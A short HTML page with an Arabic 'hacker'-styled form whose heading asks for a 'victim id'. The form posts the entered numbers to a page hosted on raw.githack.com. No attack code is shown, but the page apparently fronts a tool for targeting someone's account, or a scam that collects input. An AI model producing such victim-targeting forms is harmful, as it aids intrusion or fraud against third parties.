<!DOCTYPE html>
<html>
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="mobile-web-app-capable" content="yes">
<link rel="icon" sizes="192x192" href="icon.png">

<head>
    <meta charset="UTF-8">
    <title>صفحة HTML احترافية</title>
    <style>
        body {
            background-color: #000;
            color: #00FF00;
            font-family: Arial, sans-serif;
            text-align: center;
        }
        #content {
            background-color: #000;
            border: 2px solid #00FF00;
            padding: 20px;
            margin: 20px auto;
            width: 300px;
        }
        input[type="text"] {
            width: 100%;
            padding: 10px;
            margin-bottom: 10px;
        }
        input[type="submit"] {
            background-color: #00FF00;
            color: #000;
            border: none;
            padding: 10px 20px;
            cursor: pointer;
        }
    </style>
</head>
<body>
    <div id="content">
        <h1>ضحية id أكتب</h1>
    <form action="https://raw.githack.com/Fanan-2023/vip2023/main/id3.html" method="post"> <input type="text" name="numbers" placeholder="أدخل الأرقام هنا (أرقام فقط)"> <br> <input type="submit" value="إرسال"> </form> </div> </body> </html>